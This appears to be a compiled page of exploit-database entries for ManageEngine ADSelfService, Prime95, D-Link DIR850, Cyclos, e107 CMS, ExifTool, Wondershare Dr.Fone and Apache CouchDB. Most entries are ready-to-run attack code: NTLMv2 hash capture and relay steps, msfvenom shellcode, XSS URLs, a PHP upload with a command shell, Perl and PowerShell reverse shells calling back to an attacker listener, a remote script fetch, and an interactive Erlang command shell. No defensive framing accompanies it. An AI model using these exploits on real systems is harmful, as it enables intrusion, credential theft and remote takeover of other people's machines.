ISHACK AI BOT

# Exploit Title: ManageEngine ADSelfService Plus Build 6118 - NTLMv2 Hash Exposure # Exploit Author: Metin Yunus Kandemir # Vendor Homepage: https://www.manageengine.com/ # Software Link: https://www.manageengine.com/products/self-service-password/download.html # Details: https://docs.unsafe-inline.com/0day/multiple-manageengine-applications-critical-information-disclosure-vulnerability # Version: ADSelfService Plus Build < 6121 # Tested against: Build 6118 # CVE: CVE-2022-29457 # !/usr/bin/python3 import argparse import requests import urllib3 import random import sys """ 1- a)Set up SMB server to capture NTMLv2 hash. python3 smbserver.py share . -smb2support b)For relaying to SMB: python3 ntlmrelayx.py -smb2support -t smb://TARGET c)For relaying to LDAP: python3 ntlmrelayx.py -t ldaps://TARGET 2- Fire up the exploit. You will obtain the NTLMv2 hash of user/computer account that runs the ADSelfService in five minutes. """ urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def get_args(): parser = argparse.ArgumentParser( epilog="Example: exploit.py -t https://Target/ -l Listener-IP -a adselfservice -d unsafe.local -u operator1 -p operator1") parser.add_argument('-d', '--domain', required=True, action='store', help='DNS name of the target domain. ') parser.add_argument('-a', '--auth', required=True, action='store', help='If you have credentials of the application user, type adselfservice. If you have credentials of the domain user, type domain') parser.add_argument('-u', '--user', required=True, action='store') parser.add_argument('-p', '--password', required=True, action='store') parser.add_argument('-t', '--target', required=True, action='store', help='Target url') parser.add_argument('-l', '--listener', required=True, action='store', help='Listener IP to capture NTLMv2 hash') args = parser.parse_args() return args def scheduler(domain, auth, target, listener, user, password): try: with requests.Session() as s: gUrl = target getCsrf = s.get(url=gUrl, allow_redirects=False, verify=False) csrf = getCsrf.cookies['_zcsr_tmp'] print("[*] Csrf token: %s" % getCsrf.cookies['_zcsr_tmp']) if auth.lower() == 'adselfservice': auth = "ADSelfService Plus Authentication" data = { "loginName": user, "domainName": auth, "j_username": user, "j_password": password, "AUTHRULE_NAME": "ADAuthenticator", "adscsrf": [csrf, csrf] } #Login url = target + "j_security_check" headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"} req = s.post(url, data=data, headers=headers, allow_redirects=True, verify=False) #Auth Check url2 = target + "webclient/index.html" req2 = s.get(url2, headers=headers, allow_redirects=False, verify=False) if req2.status_code == 200: print("[+] Authentication is successful.") elif req2.status_code == 302: print("[-] Login failed.") sys.exit(1) else: print("[-] Something went wrong") sys.exit(1) dn = domain.split(".") r1 = random.randint(1, 1000) surl = target + 'ServletAPI/Reports/saveReportScheduler' data = { 'SCHEDULE_ID':'0', 'ADMIN_STATUS':'3', 'SCHEDULE_NAME': 'enrollment' + str(r1), 'DOMAINS': '["'+ domain +'"]', 'DOMAIN_PROPS': '{"'+ domain +'":{"OBJECT_GUID":"{*}","DISTINGUISHED_NAME":"DC='+ dn[0] +',DC='+ dn[1] +'","DOMAIN_SELECTED_OUS_GROUPS":{"ou":[{"OBJECT_GUID":"{*}","DISTINGUISHED_NAME":"DC='+ dn[0] +',DC='+ dn[1] +'","NAME":"'+ domain +'"}]}}}', 'SELECTED_REPORTS': '104,105', 'SELECTED_REPORT_LIST': '[{"REPORT_CATEGORY_ID":"3","REPORT_LIST":[{"CATEGORY_ID":"3","REPORT_NAME":"adssp.reports.enroll_rep.enroll.heading","IS_EDIT":false,"SCHEDULE_ELEMENTS":[],"REPORT_ID":"104"},{"CATEGORY_ID":"3","REPORT_NAME":"adssp.common.text.non_enrolled_users","IS_EDIT":true,"SCHEDULE_ELEMENTS":[{"DEFAULT_VALUE":false,"size":"1","ELEMENT_VALUE":false,"uiText":"adssp_reports_enroll_rep_non_enroll_show_notified","name":"SHOW_NOTIFIED","id":"SHOW_NOTIFIED","TYPE":"checkbox","class":"grayfont fntFamily fntSize"}],"REPORT_ID":"105"}],"REPORT_CATEGORY_NAME":"adssp.xml.reportscategory.enrollment_reports"}]', 'SCHEDULE_TYPE': 'hourly', 'TIME_OF_DAY': '0', 'MINS_OF_HOUR': '5', 'EMAIL_ID': user +'@'+ domain, 'NOTIFY_ADMIN': 'true', 'NOTIFY_MANAGER': 'false', 'STORAGE_PATH': '\\\\' + listener + '\\share', 'FILE_FORMAT': 'HTML', 'ATTACHMENT_TYPE': 'FILE', 'ADMIN_MAIL_PRIORITY': 'Medium', 'ADMIN_MAIL_SUBJECT': 'adssp.reports.schedule_reports.mail_settings_sub', 'ADMIN_MAIL_CONTENT': 'adssp.reports.schedule_reports.mail_settings_msg_html', 'MANAGER_FILE_FORMAT': 'HTML', 'MANAGER_ATTACHMENT_TYPE': 'FILE', 'MANAGER_MAIL_SUBJECT': 'adssp.reports.schedule_reports.mail_settings_mgr_sub', 'MANAGER_MAIL_CONTENT': 'adssp.reports.schedule_reports.mail_settings_mgr_msg_html', 'adscsrf': csrf } sch = s.post(surl, data=data, headers=headers, allow_redirects=False, verify=False) if 'adssp.reports.schedule_reports.storage_path.unc_storage_path' in sch.text: print('[-] The target is patched!') sys.exit(1) if sch.status_code == 200: print("[+] The report is scheduled. The NTLMv2 hash will be captured in five minutes!") else: print("[-] Something went wrong. Please, try it manually!") sys.exit(1) except: print('[-] Connection error!') def main(): arg = get_args() domain = arg.domain auth = arg.auth user = arg.user password = arg.password target = arg.target listener = arg.listener scheduler(domain, auth, target, listener, user, password) if __name__ == "__main__": main()

# Exploit Title: Prime95 Version 30.7 build 9 - Remote Code Execution (RCE) # Discovered by: Yehia Elghaly # Discovered Date: 2022-04-25 # Vendor Homepage: https://www.mersenne.org/ # Software Link : https://www.mersenne.org/ftp_root/gimps/p95v307b9.win32.zip # Tested Version: 30.7 build 9 # Vulnerability Type: Buffer Overflow (RCE) Local # Tested on OS: Windows 7 Professional x86 # Description: Prime95 Version 30.7 build 9 Buffer Overflow RCE # 1- How to use: open the program go to test-PrimeNet-check the square-Connections # 2- paste the contents of open.txt in the optional proxy hostname field and the calculator will open buffer = "A" * 144 jum = "\xd8\x29\xe7\x6e" #push esp # ret | {PAGE_EXECUTE_READ} [libhwloc-15.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\ex\libhwloc-15.dll) nop = "\x90" * 20 #Nob hot = "C" * 100 #sudo msfvenom -p windows/exec CMD=calc.exe -b "\x00\x09\x0A\x0d" -f python -v payload payload = b"" payload += b"\xbb\x72\xd7\x5d\x16\xdb\xc0\xd9\x74\x24\xf4\x5d" payload += b"\x29\xc9\xb1\x31\x83\xc5\x04\x31\x5d\x0f\x03\x5d" payload += b"\x7d\x35\xa8\xea\x69\x3b\x53\x13\x69\x5c\xdd\xf6" payload += b"\x58\x5c\xb9\x73\xca\x6c\xc9\xd6\xe6\x07\x9f\xc2" payload += b"\x7d\x65\x08\xe4\x36\xc0\x6e\xcb\xc7\x79\x52\x4a" payload += b"\x4b\x80\x87\xac\x72\x4b\xda\xad\xb3\xb6\x17\xff" payload += b"\x6c\xbc\x8a\x10\x19\x88\x16\x9a\x51\x1c\x1f\x7f" payload += b"\x21\x1f\x0e\x2e\x3a\x46\x90\xd0\xef\xf2\x99\xca" payload += b"\xec\x3f\x53\x60\xc6\xb4\x62\xa0\x17\x34\xc8\x8d" payload += b"\x98\xc7\x10\xc9\x1e\x38\x67\x23\x5d\xc5\x70\xf0" payload += b"\x1c\x11\xf4\xe3\x86\xd2\xae\xcf\x37\x36\x28\x9b" payload += b"\x3b\xf3\x3e\xc3\x5f\x02\x92\x7f\x5b\x8f\x15\x50" payload += b"\xea\xcb\x31\x74\xb7\x88\x58\x2d\x1d\x7e\x64\x2d" payload += b"\xfe\xdf\xc0\x25\x12\x0b\x79\x64\x78\xca\x0f\x12" payload += b"\xce\xcc\x0f\x1d\x7e\xa5\x3e\x96\x11\xb2\xbe\x7d" payload += b"\x56\x4c\xf5\xdc\xfe\xc5\x50\xb5\x43\x88\x62\x63" payload += b"\x87\xb5\xe0\x86\x77\x42\xf8\xe2\x72\x0e\xbe\x1f" payload += b"\x0e\x1f\x2b\x20\xbd\x20\x7e\x43\x20\xb3\xe2\xaa" payload += b"\xc7\x33\x80\xb2" evil = buffer + jum + nop + payload file = open('PExploit.txt','w+') file.write(evil) file.close()

# Exploit Title: DLINK DIR850 - Insecure Access Control # Product: Dlink # Model: DIR850 # Date: 14/1/2022 # CVE : CVE-2021-46378 # Exploit Author: Ahmed Alroky # Hardware version: b1 # Firmware version: ET850-1.08TRb03 # Vendor home page: https://www.dlink.com/ # Exploit : Visit http://<IP Address>/config.dat

# Exploit Title: Cyclos 4.14.7 - DOM Based Cross-Site Scripting (XSS) # Date: 18/04/2021 # Exploit Author: Tin Pham aka TF1T of VietSunshine Cyber Security Services # Vendor Homepage: https://www.cyclos.org/ # Version: Cyclos 4.14.7 (and prior) # Tested on: Ubuntu # CVE : CVE-2021-31674 # Description: Cyclos 4 PRO 4.14.7 and before does not validate user input at error inform, which allows remote unauthenticated attacker to execute javascript code via undefined enum. # Steps to reproduce: An attacker sends a draft URL [IP]/#users.users.public-registrationxx%3Cimg%20src=x%20onerror=%22[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']('\162\145\164\165\162\156\40\164\150\151\163')()['\141\154\145\162\164'](1)%22%3E to victim. When a victim opens the URL, XSS will be triggered.

# Exploit Title: DLINK DIR850 - Open Redirect # Product: Dlink # Model: DIR850 # Date: 14/1/2022 # CVE: CVE-2021-46379 # Exploit Author: AhmedAlroky # Hardware version: b1 # Firmware version: ET850-1.08TRb03 # Vendor home page: https://www.dlink.com/ #Exploit : Visit http://<IP Address>/boafrm/formWlanRedirect?redirect-url=http://attacker.com&wlan_id=1

# Exploit Title: Cyclos 4.14.7 - 'groupId' DOM Based Cross-Site Scripting (XSS) # Date: 17/04/2021 # Exploit Author: Tin Pham aka TF1T of VietSunshine Cyber Security Services # Vendor Homepage: https://www.cyclos.org/ # Version: Cyclos 4.14.7 (and prior) # Tested on: Ubuntu # CVE : CVE-2021-31673 # Description: A Dom-based Cross-site scripting (XSS) vulnerability at registration account in Cyclos 4 PRO.14.7 and prior allows remote attackers to inject arbitrary web script or HTML via the 'groupId' parameter. # Steps to reproduce: An attacker sends a draft URL [IP]/#users.users.public-registration!groupId=1%27%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E to victim. When a victim opens the URL, XSS will be triggered.

# Exploit Title: e107 CMS v3.2.1 - Multiple Vulnerabilities # Date: 30/04/2022 # Exploit Author: Hubert Wojciechowski # Contact Author: [email protected] # Vendor Homepage: https://e107.org/ # Software Link: https://e107.org/download # Version: 3.2.1 # Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ### XSS Reflected - Via adding comment (Authenticated) # POC Request: GET /e107/news.php/fnzi4'onchange='alert(1)'?extend.1 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Cookie: e107_tzOffset=-60; PHPSESSID=2ju9huul2lsl7565jpre0f2g40 Response: HTTP/1.1 200 OK Date: Tue, 14 Dec 2021 08:02:42 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11 X-Powered-By: e107 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache ETag: "71d7966eaa95fd8ac14da8baf3e0785d" Content-Length: 25059 Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN Connection: close Content-Type: text/html; charset=utf-8 [...] <div class='media' > <form id='e-comment-form' method='post' action='/e107/news.php/fnzi4'onchange='alert(1)'?extend.1' > [...] User click to comment in news, writes any character in the comment field, and clicks elsewhere outside the comment field image.png ### Upload restriction bypass (Authenticated [Admin]) + Stored Xss. Account with administrative privileges can bypass upload image restriction (XSS Stored from .svg file) image->media manager->upload a file->Image/File URL admin can upload SVG from localhost ->http://127.0.0.1:8070/xxe_svg2.svg # POC Request: POST /e107/e107_admin/image.php?mode=main&action=dialog&for=page^&tagid=&iframe=1&bbcode=img HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 90 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=dialog&for=page^&tagid=&iframe=1&bbcode=img Cookie: e107_tzOffset=-60; PHPSESSID=t656bpkef7ndqm0p8j9ddf9atl Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: iframe Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fxxe_svg2.svg&upload_remote_url=1&upload_caption= Response: HTTP/1.1 200 OK Date: Tue, 14 Dec 2021 02:06:14 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11 X-Powered-By: e107 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache ETag: "06ed5ef56b0f736995112cafd77e9ec0" Content-Length: 20878 Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN Connection: close Content-Type: text/html; charset=utf-8 <!doctype html> <html lang="en"> <head> <title>Media Manager - Admin Area :: trrrrrrrrrrrrrrrr [...] <div class='well clearfix media-carousel-item-container'> <a data-toggle='context' data-bs-toggle='context' class='e-media-select ' data-id='' data-width='0' data-height='0' data-src='/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg' data-type='image' data-bbcode='img' data-target='' data-path='{e_MEDIA_IMAGE}2021-12/xxe_svg2.svg' data-preview='/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg' data-preview-html='PGltZyBjbGFzcz0iaW1nLXJlc3BvbnNpdmUgaW1nLWZsdWlkIiBzcmM9Ii9lMTA3L2UxMDdfbWVkaWEvNDE2ZjQ2MDJlMy9pbWFnZXMvMjAyMS0xMi94eGVfc3ZnLnN2ZyIgYWx0PSJ4eGVfc3ZnLnN2ZyIgc3Jjc2V0PSIvZTEwNy9lMTA3X21lZGlhLzQxNmY0NjAyZTMvaW1hZ2VzLzIwMjEtMTIveHhlX3N2Zy5zdmcgMngiIHdpZHRoPSIyMTAiIGhlaWdodD0iMTQwIiAgLz4=' title="xxe_svg2.svg ()" style='' href='#' ><span><img class="img-responsive img-fluid" alt="" src="/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg" style="display:inline-block" /></span> </a> [...] image.png ### Upload restriction bypass (Authenticated [Admin])+RCE Upload and execute .PHP file Attacker must upload file to ../../../ to parent directory, due to fact that somehow application user can only execute PHP code when uploading to parent directory. image.png Media Manager-> Media Upload/Import -> From a remote location # POC Request POST /e107/e107_admin/image.php?mode=main&action=import HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 109 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=import Cookie: e107_tzOffset=-60; PHPSESSID=9ngnt3lteu7133g74qb9nu3jtu Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fcmd2.php&upload_remote_url=1&upload_caption=..%2F..%2F..%2Fcmd.php Response: HTTP/1.1 200 OK Date: Tue, 14 Dec 2021 09:02:08 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11 X-Powered-By: e107 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache ETag: "5b9621fc78893e36034b14f841f840f8" Content-Length: 26075 Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN Connection: close Content-Type: text/html; charset=utf-8 <!doctype html> <html lang="en"> <head> <title>Media Manager - Admin Area :: trrrrrrrrrrrrrrrr [...] We can see uploaded PHP file on the server side. image.png cmd.php file source: <?php system('whoami'); ?> image.png ### Upload restriction bypass (Authenticated [Admin])+ Server file override Attacker can override example top.php file in the main directory of web application. Original file top.php in server: image.png We can override file via following upload functionality: Media Manager-> Media Upload/Import -> From a remote location # POC Request: POST /e107/e107_admin/image.php?mode=main&action=import HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 109 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=import Cookie: e107_tzOffset=-60; PHPSESSID=9ngnt3lteu7133g74qb9nu3jtu Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fcmd2.php&upload_remote_url=1&upload_caption=..%2F..%2F..%2Ftop.php Response: HTTP/1.1 200 OK Date: Tue, 14 Dec 2021 09:20:10 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11 X-Powered-By: e107 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache ETag: "5b9621fc78893e36034b14f841f840f8" Content-Length: 26075 Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN Connection: close Content-Type: text/html; charset=utf-8 [...] top.php file content was tampered:

# Exploit Title: ExifTool 12.23 - Arbitrary Code Execution # Date: 04/30/2022 # Exploit Author: UNICORD (NicPWNs & Dev-Yeoj) # Vendor Homepage: https://exiftool.org/ # Software Link: https://github.com/exiftool/exiftool/archive/refs/tags/12.23.zip # Version: 7.44-12.23 # Tested on: ExifTool 12.23 (Debian) # CVE: CVE-2021-22204 # Source: https://github.com/UNICORDev/exploit-CVE-2021-22204 # Description: Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing the malicious image #!/usr/bin/env python3 # Imports import base64 import os import subprocess import sys # Class for colors class color: red = '\033[91m' gold = '\033[93m' blue = '\033[36m' green = '\033[92m' no = '\033[0m' # Print UNICORD ASCII Art def UNICORD_ASCII(): print(rf""" {color.red} _ __,~~~{color.gold}/{color.red}_{color.no} {color.blue}__ ___ _______________ ___ ___{color.no} {color.red} ,~~`( )_( )-\| {color.blue}/ / / / |/ / _/ ___/ __ \/ _ \/ _ \{color.no} {color.red} |/| `--. {color.blue}/ /_/ / // // /__/ /_/ / , _/ // /{color.no} {color.green}_V__v___{color.red}!{color.green}_{color.red}!{color.green}__{color.red}!{color.green}_____V____{color.blue}\____/_/|_/___/\___/\____/_/|_/____/{color.green}....{color.no} """) # Print exploit help menu def help(): print(r"""UNICORD Exploit for CVE-2021-22204 Usage: python3 exploit-CVE-2021-22204.py -c <command> python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port> python3 exploit-CVE-2021-22204.py -c <command> [-i <image.jpg>] python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port> [-i <image.jpg>] python3 exploit-CVE-2021-22204.py -h Options: -c Custom command mode. Provide command to execute. -s Reverse shell mode. Provide local IP and port. -i Path to custom JPEG image. (Optional) -h Show this help menu. """) # Run the exploit def exploit(command): UNICORD_ASCII() # Create perl payload payload = "(metadata \"\c${" payload += command payload += "};\")" print(f"{color.red}RUNNING: {color.blue}UNICORD Exploit for CVE-2021-22204{color.no}") print(f"{color.red}PAYLOAD: {color.gold}" + payload + f"{color.no}") # Write payload to file payloadFile = open('payload','w') payloadFile.write(payload) payloadFile.close() # Bzz compress file subprocess.run(['bzz', 'payload', 'payload.bzz']) # Run djvumake subprocess.run(['djvumake', 'exploit.djvu', "INFO=1,1", 'BGjp=/dev/null', 'ANTz=payload.bzz']) if '-i' in sys.argv: imagePath = sys.argv[sys.argv.index('-i') + 1] subprocess.run(['cp',f'{imagePath}','./image.jpg','-n']) else: # Smallest possible JPEG image = b"/9j/4AAQSkZJRgABAQEASABIAAD/2wBDAAMCAgICAgMCAgIDAwMDBAYEBAQEBAgGBgUGCQgKCgkICQkKDA8MCgsOCwkJDRENDg8QEBEQCgwSExIQEw8QEBD/yQALCAABAAEBAREA/8wABgAQEAX/2gAIAQEAAD8A0s8g/9k=" # Write smallest possible JPEG image to file with open("image.jpg", "wb") as img: img.write(base64.decodebytes(image)) # Write exiftool config to file config = (r""" %Image::ExifTool::UserDefined = ( 'Image::ExifTool::Exif::Main' => { 0xc51b => { Name => 'HasselbladExif', Writable => 'string', WriteGroup => 'IFD0', }, }, ); 1; #end """) configFile = open('exiftool.config','w') configFile.write(config) configFile.close() # Exiftool config for output image subprocess.run(['exiftool','-config','exiftool.config','-HasselbladExif<=exploit.djvu','image.jpg','-overwrite_original_in_place','-q']) # Delete leftover files os.remove("payload") os.remove("payload.bzz") os.remove("exploit.djvu") os.remove("exiftool.config") # Print results print(f"{color.red}RUNTIME: {color.green}DONE - Exploit image written to 'image.jpg'{color.no}\n") exit() if __name__ == "__main__": args = ['-h','-c','-s','-i'] if args[0] in sys.argv: help() elif args[1] in sys.argv and not args[2] in sys.argv: exec = sys.argv[sys.argv.index(args[1]) + 1] command = f"system(\'{exec}\')" exploit(command) elif args[2] in sys.argv and not args[1] in sys.argv: localIP = sys.argv[sys.argv.index(args[2]) + 1] localPort = sys.argv[sys.argv.index(args[2]) + 2] command = f"use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in({localPort},inet_aton('{localIP}')))){{open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');}};" exploit(command) else: help()

# Exploit Title: Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService) # Date: 4/27/2022 # Exploit Author: Netanel Cohen & Tomer Peled # Vendor Homepage: https://drfone.wondershare.net/ # Software Link: https://download.wondershare.net/drfone_full4008.exe # Version: up to 12.0.7 # Tested on: Windows 10 # CVE : 2021-44595 # References: https://github.com/netanelc305/WonderShell #Wondershare Dr. Fone Latest version as of 2021-12-06 is vulnerable to Incorrect Access Control. A normal user can send manually crafted packets to the ElevationService.exe and #execute arbitrary code without any validation with SYSTEM privileges. #!/bin/python3 import msgpackrpc LADDR = "192.168.14.129" LPORT = 1338 RADDR = "192.168.14.137" RPORT = 12345 param = f"IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell {LADDR} {int(LPORT)}" client = msgpackrpc.Client(msgpackrpc.Address(RADDR, 12345)) result = client.call('system_s','powershell',param) # stty raw -echo; (stty size; cat) | nc -lvnp 1338

# Exploit Title: Wondershare Dr.Fone 12.0.7 - Remote Code Execution (RCE) # Date: 4/27/2022 # Exploit Author: Netanel Cohen & Tomer Peled # Vendor Homepage: https://drfone.wondershare.net/ # Software Link: https://download.wondershare.net/drfone_full4008.exe # Version: up to 12.0.7 # Tested on: Windows 10 # CVE : 2021-44596 # References: https://github.com/netanelc305/WonderShell Wondershare LTD Dr. Fone as of 2021-12-06 version is affected by Remote code execution. Due to software design flaws an unauthenticated user can communicate over UDP with the "InstallAssistService.exe" service(the service is running under SYSTEM privileges) and manipulate it to execute malicious executable without any validation from a remote location and gain SYSTEM privileges #!/usr/bin/python3 # stty raw -echo; (stty size; cat) | nc -lvnp 1337 import socket payload = """WindowsPowerShell\\v1.0\powershell.exe -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.14.129',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" Admin 12345""" byte_message = bytes(payload, "utf-8") for i in range(1024,65500): opened_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) opened_socket.sendto(byte_message, ("192.168.14.137", i)) print(f"Trying port {i}",end="\r")

# Exploit Title: Apache CouchDB 3.2.1 - Remote Code Execution (RCE) # Date: 2022-01-21 # Exploit Author: Konstantin Burov, @_sadshade # Software Link: https://couchdb.apache.org/ # Version: 3.2.1 and below # Tested on: Kali 2021.2 # Based on 1F98D's Erlang Cookie - Remote Code Execution # Shodan: port:4369 "name couchdb at" # CVE: CVE-2022-24706 # References: # https://habr.com/ru/post/661195/ # https://www.exploit-db.com/exploits/49418 # https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/ # https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd#erlang-cookie-rce # # #!/usr/local/bin/python3 import socket from hashlib import md5 import struct import sys import re import time TARGET = "" EPMD_PORT = 4369 # Default Erlang distributed port COOKIE = "monster" # Default Erlang cookie for CouchDB ERLNAG_PORT = 0 EPM_NAME_CMD = b"\x00\x01\x6e" # Request for nodes list # Some data: NAME_MSG = b"\x00\x15n\x00\x07\x00\x03\x49\x9cAAAAAA@AAAAAAA" CHALLENGE_REPLY = b"\x00\x15r\x01\x02\x03\x04" CTRL_DATA = b"\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03" CTRL_DATA += b"\x00\x00\x00\x00\x00w\x00w\x03rex" def compile_cmd(CMD): MSG = b"\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00" MSG += b"\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k" MSG += struct.pack(">H", len(CMD)) MSG += bytes(CMD, 'ascii') MSG += b'jw\x04user' PAYLOAD = b'\x70' + CTRL_DATA + MSG PAYLOAD = struct.pack('!I', len(PAYLOAD)) + PAYLOAD return PAYLOAD print("Remote Command Execution via Erlang Distribution Protocol.\n") while not TARGET: TARGET = input("Enter target host:\n> ") # Connect to EPMD: try: epm_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) epm_socket.connect((TARGET, EPMD_PORT)) except socket.error as msg: print("Couldnt connect to EPMD: %s\n terminating program" % msg) sys.exit(1) epm_socket.send(EPM_NAME_CMD) #request Erlang nodes if epm_socket.recv(4) == b'\x00\x00\x11\x11': # OK data = epm_socket.recv(1024) data = data[0:len(data) - 1].decode('ascii') data = data.split("\n") if len(data) == 1: choise = 1 print("Found " + data[0]) else: print("\nMore than one node found, choose which one to use:") line_number = 0 for line in data: line_number += 1 print(" %d) %s" %(line_number, line)) choise = int(input("\n> ")) ERLNAG_PORT = int(re.search("\d+$",data[choise - 1])[0]) else: print("Node list request error, exiting") sys.exit(1) epm_socket.close() # Connect to Erlang port: try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((TARGET, ERLNAG_PORT)) except socket.error as msg: print("Couldnt connect to Erlang server: %s\n terminating program" % msg) sys.exit(1) s.send(NAME_MSG) s.recv(5) # Receive "ok" message challenge = s.recv(1024) # Receive "challenge" message challenge = struct.unpack(">I", challenge[9:13])[0] #print("Extracted challenge: {}".format(challenge)) # Add Challenge Digest CHALLENGE_REPLY += md5(bytes(COOKIE, "ascii") + bytes(str(challenge), "ascii")).digest() s.send(CHALLENGE_REPLY) CHALLENGE_RESPONSE = s.recv(1024) if len(CHALLENGE_RESPONSE) == 0: print("Authentication failed, exiting") sys.exit(1) print("Authentication successful") print("Enter command:\n") data_size = 0 while True: if data_size <= 0: CMD = input("> ") if not CMD: continue elif CMD == "exit": sys.exit(0) s.send(compile_cmd(CMD)) data_size = struct.unpack(">I", s.recv(4))[0] # Get data size s.recv(45) # Control message data_size -= 45 # Data size without control message time.sleep(0.1) elif data_size < 1024: data = s.recv(data_size) #print("S---data_size: %d, data_recv_size: %d" %(data_size,len(data))) time.sleep(0.1) print(data.decode()) data_size = 0 else: data = s.recv(1024) #print("L---data_size: %d, data_recv_size: %d" %(data_size,len(data))) time.sleep(0.1) print(data.decode(),end = '') data_size -= 1024

